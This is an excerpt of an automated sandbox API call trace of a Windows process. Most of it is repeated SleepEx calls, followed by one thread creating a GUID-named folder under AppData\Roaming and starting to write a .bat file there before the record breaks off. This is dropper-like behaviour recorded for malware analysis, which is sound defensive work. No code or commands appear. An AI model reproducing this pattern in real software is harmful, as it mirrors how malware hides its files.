[0066.715] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0067.722] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0068.760] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0069.778] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0070.782] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0071.794] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0072.819] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0073.920] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0074.931] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0075.947] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0076.958] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0077.987] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0079.001] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0080.015] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0081.038] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0082.065] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0083.077] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0084.088] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0085.103] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0086.150] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0087.236] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0088.275] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0089.283] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0090.297] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0091.379] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0092.399] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0093.441] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0094.453] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0095.473] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0096.479] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0097.499] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0098.511] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0099.551] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0100.563] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0101.603] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0102.629] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0103.633] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0104.725] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0105.754] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0106.770] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0107.784] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0108.798] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0109.820] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0110.836] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0111.843] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0112.856] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0113.955] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0114.962] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0115.974] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0116.987] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0118.007] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0119.030] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0120.045] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0121.058] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0122.077] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0123.109] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0124.118] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0125.164] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0126.329] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0127.340] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0128.347] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0129.398] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0130.546] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0131.573] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0132.626] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0133.632] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0134.683] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0135.725] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0136.746] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0137.777] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0138.796] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0139.825] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0140.847] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0141.855] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0142.867] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0143.886] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0144.909] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0145.951] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0146.955] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0147.969] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0148.986] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0150.042] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0151.073] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0152.103] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0153.155] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0154.380] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0155.410] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0156.492] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0157.515] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0158.530] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0159.546] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0160.570] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0161.575] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0162.596] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0163.603] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0164.621] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0165.635] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0166.643] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0167.661] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0168.689] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0169.725] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0170.739] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0171.823] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0172.839] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0173.866] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0174.880] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0175.905] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0176.917] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0177.929] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0178.942] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0179.950] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0180.966] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0181.981] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0182.992] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0184.020] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0185.038] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0186.206] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0187.229] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0188.247] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0189.282] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0190.307] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0191.330] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0192.348] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0193.379] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0194.396] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0195.422] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) Thread: id = 7 os_tid = 0x900 [0030.231] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0030.232] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0032.163] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0034.672] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0035.680] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0036.702] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0037.978] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0038.994] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0040.053] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0041.095] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0042.140] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0043.193] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0044.214] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0045.272] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0046.302] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0047.461] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0049.828] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0050.937] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0051.953] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0052.975] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0053.992] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0055.006] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0056.032] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0057.054] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0058.069] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0059.091] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0060.100] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0061.119] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0062.312] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0063.328] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0064.346] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0065.356] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0066.372] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0067.387] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0068.393] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0069.410] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0070.421] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0071.435] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0072.458] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0073.468] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0074.483] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0075.494] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0076.507] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0077.527] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0078.541] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0079.554] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0080.565] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0081.593] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0082.609] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0083.623] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0084.690] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0085.703] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0086.724] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0087.809] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0088.816] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0089.830] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0090.847] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0091.861] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0092.874] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0093.883] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0094.900] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0095.914] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0096.931] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0097.940] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0098.963] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0099.983] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0101.000] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0102.016] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0103.042] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0104.071] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0105.084] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0106.102] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0107.116] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0108.129] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0109.170] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0110.183] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0111.223] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0112.255] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0113.299] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0114.308] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0115.323] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0116.340] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0117.351] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0118.366] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0119.407] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0120.425] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0121.444] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0122.451] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0123.562] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0124.581] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0125.585] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0126.602] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0127.645] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0128.663] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0129.829] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0130.848] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0131.859] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0132.887] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0133.899] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0134.914] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0135.926] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0136.940] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0137.962] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0138.996] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0140.017] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0141.033] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0142.043] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0143.062] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0144.078] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0145.084] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0146.161] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0147.204] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0148.295] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0149.300] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0150.309] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0151.370] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0152.414] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0153.435] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0154.686] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0155.740] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0156.845] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0157.946] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0158.982] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0160.006] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0161.258] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0162.272] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0163.291] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0164.306] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0165.484] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0166.489] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0167.584] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0168.600] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0169.617] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0170.623] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0171.638] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0172.664] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0173.687] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0174.700] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0175.716] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0176.819] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0177.843] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0178.867] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0179.875] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0180.900] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0181.921] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0182.935] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0183.948] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0184.956] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0186.172] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0187.186] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0188.204] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0189.225] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0190.249] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0191.280] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0192.310] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0193.365] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0194.394] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0195.415] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) Thread: id = 8 os_tid = 0x904 [0030.291] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0030.468] BCryptGetFipsAlgorithmMode (in: pfEnabled=0xa33dfc0 | out: pfEnabled=0xa33dfc0) returned 0x0 [0030.810] CoCreateGuid (in: pguid=0xa33e01c | out: pguid=0xa33e01c*(Data1=0xc48c75d7, Data2=0x8c0a, Data3=0x457a, Data4=([0]=0x8b, [1]=0x56, [2]=0xb8, [3]=0xaa, [4]=0xd0, [5]=0x76, [6]=0x1b, [7]=0x9a))) returned 0x0 [0031.628] CoTaskMemAlloc (cb=0x20c) returned 0x535420 [0031.628] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x535420 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x0 [0031.630] CoTaskMemFree (pv=0x535420) [0031.630] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0xa33da74, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpFilePart=0x0) returned 0x2d [0031.631] CoCreateGuid (in: pguid=0xa33e01c | out: pguid=0xa33e01c*(Data1=0x7bc215dc, Data2=0xade3, Data3=0x41ce, Data4=([0]=0x99, [1]=0x40, [2]=0x63, [3]=0x29, [4]=0x6e, [5]=0x9c, [6]=0x3d, [7]=0xd5))) returned 0x0 [0031.728] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}", nBufferLength=0x105, lpBuffer=0xa33f2a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}", lpFilePart=0x0) returned 0x54 [0031.730] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xa33f690) returned 1 [0031.731] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}"), fInfoLevelId=0x0, lpFileInformation=0xa33f70c | out: lpFileInformation=0xa33f70c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0031.731] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xa33f68c) returned 1 [0031.731] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xa33f690) returned 1 [0031.732] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}"), fInfoLevelId=0x0, lpFileInformation=0xa33f70c | out: lpFileInformation=0xa33f70c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0031.732] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xa33f68c) returned 1 [0031.732] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xa33f690) returned 1 [0031.732] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming"), fInfoLevelId=0x0, lpFileInformation=0xa33f70c | out: lpFileInformation=0xa33f70c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xcfb44d60, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xcfb44d60, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1 [0031.732] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xa33f68c) returned 1 [0031.734] CreateDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}"), lpSecurityAttributes=0x0) returned 1 [0031.738] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat", nBufferLength=0x105, lpBuffer=0xa33f148, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat", lpFilePart=0x0) returned 0x63 [0031.738] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xa33f63c) returned 1 [0031.738] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js 